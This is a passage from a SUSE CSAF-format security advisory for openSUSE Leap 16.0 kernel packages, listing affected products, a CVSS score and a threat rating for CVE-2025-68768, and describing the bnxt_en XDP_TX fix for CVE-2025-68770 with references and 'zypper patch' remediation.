"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
